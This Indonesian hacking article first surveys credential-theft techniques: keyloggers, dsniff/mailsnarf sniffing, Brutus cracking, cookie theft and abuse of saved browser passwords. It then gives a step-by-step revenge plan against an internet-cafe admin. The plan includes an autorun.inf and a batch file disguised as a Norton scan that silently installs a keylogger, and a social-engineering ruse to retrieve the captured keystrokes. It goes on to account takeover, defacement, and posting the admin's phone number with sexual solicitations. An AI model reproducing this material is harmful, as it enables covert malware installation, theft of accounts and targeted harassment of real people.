paling sering digunakan:

[1]. Social Engineering
[2]. KeyLogger
[3]. Web Spoofing
[4]. Menghadang Email
[5]. Password Cracking
[6]. Session Hijacking
[7]. Menjadi Proxy Server
[8]. Memanfaatkan Kelalaian User Dalam Penggunaan Fitur Browser

[9]. Googling

[1]. Social Engineering

Social Engineering adalah nama suatu tehnik pengumpulan informasi dengan
memanfaatkan celah psikologi korban. Atau mungkin boleh juga dikatakan sebagai
“penipuan” :P Sosial Engineering membutuhkan kesabaran dan kehati-hatian agar
sang korban tidak curiga. Kita dituntut untuk kreatif dan mampu berpikiran
seperti sang korban.

Social Engineering merupakan seni “memaksa” orang lain untuk melakukan sesuatu
sesuai dengan harapan atau keinginan anda. Tentu saja “pemaksaan” yang
dilakukan tidak secara terang-terangan atau diluar tingkah laku normal yang
biasa dilakukan sang korban.

Manusia cenderung untuk percaya atau mudah terpengaruh terhadap orang yang
memiliki nama besar, pernah (atau sedang berusaha) memberikan pertolongan,
dan memiliki kata-kata atau penampilan yang meyakinkan. Hal ini sering
dimanfaatkan pelaku social engineering untuk menjerat korbannya. Seringkali
sang pelaku membuat suatu kondisi agar kita memiliki semacam ketergantungan
kepadanya.Ya,tanpa kita sadari dia mengkondisikan kita dalam suatu masalah dan
membuat ( seolah – olah hanya ) dialah yang bisa mengatasi masalah itu. Dengan
demikian,tentu kita akan cenderung untuk menuruti apa yang dia instruksikan
tanpa merasa curiga.

Sosial Engineering adakalanya menjadi ancaman serius. Memang sepertinya tidak
ada kaitan dengan teknologi, namun sosial engineering tetap layak diwaspadai
karena bisa berakibat fatal bagi sistem anda. Why?? Karena bagaimanapun juga
suatu komputer tetap saja tidak bisa lepas dari manusia. Ya, tidak ada satu
sistem komputerpun di muka bumi ini yang bisa lepas dari campur tangan
manusia. ehebat apapun pertahanan anda, jika anda sudah dikuasai oleh attacker
melalui social engineering, maka bisa jadi anda sendirilah yang membukakan
jalan masuk bagi sang attacker.

# Contoh Social Engineering sederhana:
Baca Attachment[Pembalasan Untuk Sang Admin - SOcial Engineering]

[2]. KeyLogger

KeyLogger adalah software yang dapat merekam aktivitas user. Hasil rekaman itu
biasa disimpan berupa teks atau gambar. KeyLogger bekerja berdasarkan ketukan
keyboard user. Aplikasi ini mampu mengenali form-form sensitif seperti form
password misalnya.

Ada cara aman untuk menghindari keyloger:
1. Gunakan password dengan karakter special seperti !@#$%^&*(){}[]. Kebanyakan
keyloger akan mengabaikan karakter ini sehingga sang pelaku (pemasang
keyloger) tidak akan mendapatkan password anda yang sebenarnya.

2. Persiapkan password dari rumah, simpan dalam bentuk teks. Saat ingin
memasukkan password, tingal copy-paste ajah. Keyloger akan membaca password
anda berdasarkan ketukan keyboard. Namun cara ini agak beresiko. Mengapa?
karena saat anda melakukan copy, data anda akan tersimpan di clipboard. Saat
ini banyak dijumpai software-software gratis yang bisa menampilkan data dalam
clipboard.

[3]. Web Spoofing

Masih ingat kasus pecurian Account sejumlah nasabah Bank BCA? Ya, itulah salah
satu contoh nyata dari Web spoofing. Inti dari tehnik ini ialah dengan
memanfaatkan kesalahan user saat mengetikkan alamat situs pada address bar.
Pada dasarnya, Web Spoofing adalah usaha untuk menipu korban agar mengira dia
sedang mengakses suatu situs tertentu, padahal bukan.

Pada kasus bank BCA, pelaku membuat situs yang sangat mirip dan identik dengan
situs aslinya sehingga sang korban yang terkecoh tidak akan merasa ragu
mengisikan informasi sensitif seperti user name dan Passwordnya. Padahal,
karena situs tersebut adalah situs tipuan, maka semua informasi berharga tadi
terekam oleh webserver palsu, yaitu milik sang pelaku.

[4]. Menghadang Email

Menghadang email? Ya, dan sangat mudah untuk melakukan hal ini. Salah satu
cara adalah dengan menggunakan mailsnarf yang terdapat pada utility dsniff.
Cara kerja Mailsnarf adalah dengan menghadang paket data yang lewat di
Internet dan menyusunnya menjadi suatu email utuh.

Dsniff dan mailsnift merupakan software bekerja atas dasar WinPcap (setara
dengan libcap pada Linux) yaitu suatu library yang menangkap paket-paket data.
Paket-paket yang ditangkap ini akan disimpan dalam bentuk file oleh Windump,
sedangkan Dsniff dan MailSnarf bertindak lebih jauh lagi yaitu menganalisa
paket-paket data ini dan menampilkan password (dsniff) atau isi email
(mailsnarf).

Baca artikel terkait pada arsip lama :)

[5]. Password Cracking

“Hacking while sleeping.” itulah ungkapan yang biasa dipakai oleh orang-orang
yang melakukan password cracking. Mengapa? Karena pada umumnya dibuthkan waktu
yang lama untuk melakukan pasword cracking. Bisa berjam-jam, bahkan berhari -
hari! Semua itu tergantung dari target, apakah sang target menggunakan
password yang umum, password memiliki panjang karakter yang tidak biasa, atau
password memiliki kombinasi dengan karakter-karakter special.

Salah satu software yang biasa digunakan untuk melakukan hal ini ialah dengan
mengunakan Brutus, salah satu jenis software remote password cracker yang
cukup terkenal. Brutus bekerja dengan teknik dictionary attack atau
bruce-force attack terhadap port-port http, POP3,ftp, telnet, dan NetBIOS.

Dictionary Attack bekerja dengan mencobakan kata-kata yang ada dalam kamus
password. Sedangkan brute – force attack bekerja dengan mencobakan semua
kombinasi huruf, angka, atau karakter.

Brute Force Atack bekerja sangat lambat dan membutuhkan waktu yang lama
tergantung dari jenis spesifikasi komputernya dan panjang karakter
passwordnya. Saat ini telah banyak situs yang menutup akses terhadap akses
terhadap usaha login yang secara terus-menerus tidak berhasil.


[6]. Session Hjacking

Session hijacking dewasa ini semakin marak dikalangan para attacker. Session
Hijacking biasa dilakukan dengan melakukan peniruan cookies. Jadi pada
intinya, kita harus bisa meniru cookies sang korban untuk mendapatkan sesi
loginnya.

Lalu bagaimana cara mendapatkan cookies sang korban?
1. Dengan analisa Cookies. Cara ini relatif sulit dilakukan.
2. Mencuri Cokies.
Misalnya Sang Attacker ingin mendapatkan account si A. Sang Attacker bisa
dengan mudah membuat semacam script Java Script yang disisipkan dalam email
untuk dikirim ke korban.Saat korban membuka email itu, tanpa sadar cookiesnya
akan dicuri dan direkam ke suatu webserver dengan memanfaatkan suatu script
PHP.

Belakangan ini yang paling sering menjadi incaran adalah account Friendster.
Ada yang menyisipkan suatu scipt lewat testimonial, ada yang menyisipkannya di
profilnya sendiri untuk mencuri cookies sang korban dan lain sebagainya. Saya
memiliki tips untuk ini:

1. Jangan menggunakan browser InternetExplorer saat ingin membuka profil orang
lain. Catat alamat profil yang ingi anda lihat,logout terlebih dahulu dari
account anda dan bersihkan semua cookies, baru kemudian bukalah profil
Friendster tujuan.
2. Ketika menerima testimonial, periksa terlebih dahulu source codenya. Apakah
disana terdapat script asing atau kata-kata yang identik dengan pembajakan
seperti : “HACKED”, “DEFACED”, “OWNED”.. dll.. Jika ragu-ragu……. reject
ajah..
3. Waspada ketika tanpa suatu alasan yang jelas tiba-tiba anda logout dengan
sendirinya dari account anda. Saat anda diminta memasukkan username dan
password, lihat dulu addressbar anda! apakan anda sedang berada di situs
yang semestinya atau tidak. Periksa source code halaman tersebut.Lihat pada
form action, kemana informasi anda nantinya akan dikirim.

Sebenarnya session hijacking bisa dicegah jika saja sang penyedia layanan
memperhatikan hal-hal berikut:

1. Menetapkan session identifier yang unik
2. Menetapkan sistem identifier berpola acak
3. Session identifier yang independen
4. Session identifier yang bisa dipetakan dengan koneksi client side.

Fenomena lain adalah,hingga saat artikel ini diterbitkan,ternyata masih banyak
dijumpai para user yang tidak melakukan sign out setelah membuka accountnya.
Dengan demikian, orang lain yang mengunakan komputer itu dan membuka website
yang sama dengan yang telah dibuka oleh orang pertama akan otomatis login ke
account sang korban.

[7]. Menjadi Proxy Server

Kita bisa mengumpulkan informasi dengan menjadi proxy server bagi korban
untuk dapat berselancar. Dengan menjadi proxy server, seluruh identitas sang
peselancar bisa menjadi milik kita.

[8]. Memanfaatkan Kelalaian user dalam penggunaan fitur browser

Setiap browser tentunya memiliki fitur yang ditujukan untuk kemudahan dan
kenyamanan penggunanya dalam berselancar. Diantaranya ialah dengan adanya
cache dan Password Manager.

Di Internet tentunya banyak suatu website yang isinya tidak berubah dalam
beberapa hari (Contohnya spyrozone.net nich.. hehehe ;) Nah, untuk situs yang
seperti ini cache menjadi hal yang sangat berguna. Cache akan menyimpan
file-file hasil browsing sehinga nantinya jika anda berkunjung lagi ke situs
tersebut browser tidakperlu lagi melakukan download untuk kedua kalinya dari
server sehingga setiap halaman situs yang telah anda buka sebelumnya akan
terbuka dengan lebih cepat. Semua itu biasanya diatur oleh header time to
live.

Lho, bagaimana dengan situs-situs penyedia berita yang selalu up to date?
Untuk site yang seperti itu, time to live-nya akan di set=0 sehinga nantinya
anda akan terus melakukan download setiap kali berkunjung.

Cukup nyaman bukan? Ya, tapi ancaman mulai timbul. Cobalah kini anda jelajahi
opsi-opsi yang berkaitan dengan cache pada browser anda. Tentu anda bisa
menemui bahwa ada fasilitas untuk menentukan berapa besarnya file temporary
yang bisa disimpan di harddisk. Cari juga lokasi dimana file-file tersebut
akan disimpan.

Coba anda buka folder tersebut, anda akan menemui file-file html & file-file
gambar dari site-site yang sudah anda kunjungi. Pada Browser IE, anda bisa
melihat lokasi file cache dengan menjelajahi menu Tools —> Internet options
—> Settings

Lalu apa yang bisa didapatkan?? toh cuma file-file “sampah”?? Hmm… sekarang
coba anda copy semua file yang ada di sana ke suatu folder. Lalu bukalah
salah-satu file htmlnya. Jika itu komputer publik,anda bisa mengetahui situs
apa saja yang telah diakses oleh oleh orang sebelum anda.

Hmm.. hanya dengan melihat file temporary anda bahkan bisa melihat password
dan dll.Banyak saya temui situs yang menyimpan password dan menampilkannya
pada url. Tentunya anda juga pasti sering membacanya di berbagai tutorial.

Kebanyakan browser pada saat ini memiliki fasilitas untuk menyimpan password.
Misalnya saat meggunakan Mozilla Firefox, anda pasti sering menerima kotak
dialog konfirmasi yang menanyakan apakah anda ingin password anda disimpan
atau tidak oleh PasswordManager.Kebanyakan user cenderung untuk memilih opsi
YES, entah itu dengan penuh kesadaran atau memang mereka tidak tau ( baca:
tidak mau tau) apa maksud dari kotak dialog itu.

Orang lain yang kemudian mengunakan browser itu bisa dengan sangat mudah
mendapatkan password korban dengan memasuki menu Tools —> Options —>
Security –> Saved password.

Contoh lain adalah fasilitas wand password yang dimiliki oleh browser Opera.
Saat anda memasukkan user name dan password pada suatu form dan menekan
tombol submit, opera secara default akan meminta konfirmasi kepada anda
apakah anda ingin browser menyimpan id dan password anda atau tidak. Lagi dan
lagi… kebanyakan netter ceroboh, mereka cenderung untuk memilih opsi “YES”.

Lalu?? Orang lain yang kemudian menggunakan browser itu bisa melihat
situs apa saja yang telah diakses oleh user, arahkan browser ke situs
tersebut, letakkan cursor pada form isian user name, tekan [ALT]+[ENTER] dan
BOOOMM!!!! Kenapa?? Jangan kaget dulu!! Hehehe.. form login akan otomatis
terisi dengan user name korban lengkap dengan passwordnya ;D (It’s fun
enough.. ;)

Ini hanya sebagian kecil contoh, jelajahi fitur-firtur browser lain!

[9]. Googling

Google.com. Banyak sudah situs yang runtuh, password dan nomor – nomor kartu
kredit yang dicuri akibat dari ulah orang yang menyalahgunaan kesaktiannya ;)
Dahulu, hal ini mudah dilakukan.Hanya dengan mengetikkan kata kunci tertentu
yang berkaitan dengan user name dan password, anda bisa memanen ratusan
password user melalui google. Tapi sekarang tampaknya anda harus gigit jari
jika menggunakan cara diatas ;D

Jangan sedih dulu karena Google baru saja menelurkan produk barunya, yaitu
Google Code Search. Ancaman baru mulai timbul, “si pintar” ini kini dapat
meng-crawl hingga kepada archive file yang berada di public directory web
server. Hati-hati yang punya kebiasaan untuk menyimpan informasi penting di
dalamnya (password, dan info berharga lainnya) Sebaiknya mulai sekarang
kebiasaan itu dihilangkan. Selalu proteksi folder-folder yang sensitif agar
situs anda bisa hidup lebih lama. Kalo nggak… yach.. tunggu ajah ada orang
yang memanfaatkan produk baru google ini untuk mengeruk informasi sensitif
dari web server anda. dan jika itu sudah terjadi… maka bersiaplah.. “taman
bermain” anda akan diambil alih olehnya..

|—[Table of Contents

1. Introduction
2. Serangan pertama
3. Serangan kedua
4. Hari pembalasan
5. Cara pencegahan
6. Penutup

1. Introduction

Semakin paranoidnya para admin belakangan ini menyebabkan banyak pengguan jasa
layanan internet cafe (warnet) menjadi kurang nyaman. Restriction (pembatasan)
disana-sini (walaupun semua itu dilakukan bukan tanpa alasan) menjadi salah
satu inspirasi bagi banyak orang untuk mencari-cari cara menerobos segala
keterbatasan itu dan saling men-share pengetahuan mereka. Berbagai jenis
exploit pun dibedah, didiskusikan dan dikemas menjadi artikel untuk para
newbie.

Sejenak para newbie bisa tertawa puas, berjaya, senyum-senyum sendiri sampai
tak jarang lupa diri :P Namun semua itu tentunya tidak bertahan lama. Admin
menjadi semakn pintar. Fasilitas Floppy drive dan CD room drive dihapus dan
melarang user untuk melakukan segala bentuk transfer file dari media
penyimpanan sementara (disket, cd, flashdisk) kecuali melalui server terlebih
dahulu. Ini merupakan fenomena yang akhir-akhir ini bisa kita temui dengan
mudah di berbagai Internet cafe. Admin mulai rajin mengupdate path sehingga
exploit-exploit yang dulu dibangga-banggakan oleh kaum newbie menjadi
"rongsokan" tak berguna.

Sekarang, mari kita bangunkan sang admin dari mimpi indahnya untuk menunjukkan
bahwa menjadi paranoid itu adakalanya tidak baik dan tidak ada system yang
100% secure.

2. Serangan pertama

Kita akan menjadi seorang "agen mata-mata" (hehehe.. gw pake istilah ini biar
ente merasa agak sedikit keren) yang akan merekam segala aktivitas sang admin.
Tujuannya.. banyak! dan salah satunya seperti hal yang banyak diinginkan
orang... mendapatkan password sang admin. Partner kita kali ini adalah
navw32.exe, sebuah keyloger dengan icon Norton AntiVirus yang bisa kamu
dapatkan suka-suka dengan harga cuma-cuma di halaman member www.spyrozone.net
kategori Keyloger. Setelah kamu download keyloger tersebut, ikuti langkah -
langkah berikut:

---[1 Bukalah Notepad kemudian ketik baris script berikut:

[autorun]
open=nav.bat

Klik [file][save] kemudian pada box save as type, pilih All Files dan pada
form isian name beri nama Autorun.inf lalu klik tombol [save].

—[2 Buka lembar baru pada notepad dengan klik menu [file] [new] lalu ketik
script berikut:

@echo off
echo Norton Antivirus 2006
echo Scanning disk drive…
echo Please wait…
copy navw32.exe %windir%\navw32.exe
call %windir%\navw32.exe
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo. Scanning complette! No virus threat detected!
echo.
cls

Klik [file][save] kemudian pada box save as type, pilih All Files dan pada
form isian name beri nama nav.bat lalu klik tombol [save].

—[3. Persiapkan beberapa file microsoft word documents (bisa diganti dengan
file lain) sebagai tipuan/alasan untuk di transfer. Semakin banyak file,
semakin baik karena file keyloger kamu akan semakin tersamarkan.

—[4. Persiapkan sebuah cd kosong (bekas juga boleh) lalu bakar semua file
diatas (autorun.inf, nav.bat, navw32.exe dan file-file tipuan) kedalam CD.

Sekarang pergilah ke warnet tempat sang admin berkuasa. Bersikaplah seperti
biasa dan jangan gugup selayaknya para koruptor yang sering nampang di
satasion-stasion TI-PI tanpa rasa malu. Setelah kamu login ke billing komputer
user, datangi sang admin. Katakan pada beliau, “Mas/mbak/om/tante/, mau
transfer file dari cd ini. Nama filenya blablabla tolong dikirim ke komputer
nomor blablabla.”

Begitu CD dimasukkan, saat itulah terjadi sebuah fenomena berikut:
Komputer akan memproses file autorun.inf secara otomatis —> file autorun.inf
akan memproses file nav.bat —> file nav.bat akan menduplikasi file
navw32.exe ke dalam directory windows dan mengaktivkannya —> Keyloger telah
terinstall, hasil rekamannya akan tersimpan di directory yang sama dengan nama
navw32.dll beratribut hidden.

Perlu diketahui bahwa keyloger ini tidak akan menampilkan kotak dialog dalam
bentuk apapun! So, nggak usah khawatir bakal ketahuan ;)

Sekarang, kamu bisa pulang dengan wajah tanpa dosa dan mungkin (lagi – lagi)
kamu bakalan senyum-senyum sendiri sambil mengelus-elus jenggot kayak habis
menang togel.

Lalu bagaimana cara mengambil file hasil rekaman keyloger di directory windows
sang admin? Ikuti langkah-langkah pada serangan kedua.

3. Serangan kedua

Dua hari Kemudian, datanglah ke warnet itu lagi. Bertingkahlakulah secara
wajar dan beraktivitas seperti layaknya user biasa. Setelah selesai
berinternet ria, datangi sang admin, bayarlah biaya browsing seperti biasa
lalu dengan wajah sangat-sangat memelas seperti pengemis di jalanan :) katakan
pada beliau,”Mas/mbak/om/tante/, komputer saya bermasalah neeh. Menurut pesan
Error yang muncul, file navw32.dll yang berada di directory windows hilang.
File tersebut beratribut hidden. Tolong doong copykan dari komputer ini.
Kebetulan versi windowsnya sama dengan komputer saya..”

Tentu saja biasanya sang admin dengan sangat senang hati akan membantu kamu.
Dengan suka rela dan penuh kesadaran beliau akan mengaktifkan opsi Show All
files pada Folder Options dan mengcopy-kan file navw32.dll dari directory
windows tanpa menyadari bahwa file tersebut bukan file system, namun file
hasil rekaman keyloger.

Berikan disket/cd/flashdisk mu dan setelah file tersebut tersimpan, ucapkan
beribu terima kasih lalu pulanglah ke rumah. Buka file tersebut di rumah. Klik
2x pada file lalu ketika muncul kotak dialog open with, klik opsi select
program from a list dan pilih notepad pada daftar program yang ditampilkan.
Sekarang tentunya kamu bisa leluasa membaca rekaman aktivitas sang admin. Cari
password emailnya dan kamu bisa menuju pada hari pembalasan.

4. Hari Pembalasan

Pilih hari yang tepat, misalnya malam jum’at kliwon dimana sang admin mungkin
sedang terlelap di rumahnya. Nyalakan komputermu dan connectlah ke Internet.
Namun ada baiknya kamu lakukan hal ini di warnet agar lebih aman. Carilah
warnet yang buka 24 jam.

Berbekal hasil rekaman keyloger tadi, loginlah ke account email sang admin.
Setelah puas menjelajahi emailnya, subscriblah ke berbagai mailing list besar
dengan email tersebut. Subscribe sebanyak-banyaknya.

Hohoho.. lalu apa lagi nich?? Kalau sang admin punya blog/website pribadi/
account Friendster.. tentu kamu dengan mudah mendapatkan semua password itu
dengan fasilitas forgot password. Kebanyakan penyedia layanan seperti itu akan
mengirimkan password via email. So, setelah dapat semuanya… heheh… DEFACE
ajah ;) Tapi inget lho, halaman lama harus tetap di backup dan jangan merubah
password apapun!!

Ada ide yang sedikit lebih sadis (ini cuma ide lho.. sebaiknya jangan
dilakukan deech..). Daftarkan emailnya ke berbagai situs – situs porno dan
postinglah sebuah pesan singkat, memikat dan “mematikan”. Berikut contohnya
jika milis tersebut berbahasa Indonesia:

Dear all..
gwe lagi nafsu berat neeh, burun telepon gwe doong sekarang juga!! neeh no
telp gwe: 021-blablabla (masukkan no telp sang admin)
gwe tunggu 24 jam lho!!

Atau terserah kamu laah.. saya rasa kamu lebih pintar dalam memilih kata- kata
yang yahuud!! ;D

Maka bisa dipastikan malam itu akan menjadi malam jumat kliwon paling
mengerikan bagi sang admin, lebih mengerikan daripada film-film horor manapun!
Telepon rumahnya akan berdering tanpa henti dibanjiri oleh telepon dari dalam
dan luar negeri dengan maksud pembicaraan yang sudah bisa ditebak apa
maksudnya ;D

Keesokan harinya, setelah menghadapi malam paling mengerikan itu, sang admin
akan kaget 1/2 hidup 1/2 mati mendapati inboxnya penuh dengan email-email dari
berbagai milis yang beliau sendiri tidak merasa pernah bergabung dengan
milis-milis itu. Dan bisa jadi, saat beliau sedang sibuk Unsubcribe dari
milis-milis tersebut, telepon rumahnya masih terus – terusan menjerit – jerit
dengan jeritan indah :D

5. Pencegahan

Jika kamu adalah admin yang tidak mau mengalami nasib seperti diatas, maka
setiap kamu menerima CD dari siapapun..
1. Buka windows explorer
2. Tekan-tahan tombol shift sambil memasukkan CD kedalam CD Room dRive.
3. Setelah CD masuk,tetap tekan tombol shift sampai kira-kira 25 detik.Setelah
itu kamu bisa melepas tombol shift dan mengaksesnya melalui panel sebelah kiri
windows Explorer. Klik pada area folder tree, jangan pada daftar drive sebelah
kanan karena fitur autorun akan aktif.

Pesan Saya JGN terlalu percaya seseorang dengan Muka yang Polos atau tidak berdosa,,, Karena di Balik Mukanya itu anda tidak tau siapa sebenarnya Dia... Semoga bermanfaat dan tgg artikel berikutnya yah.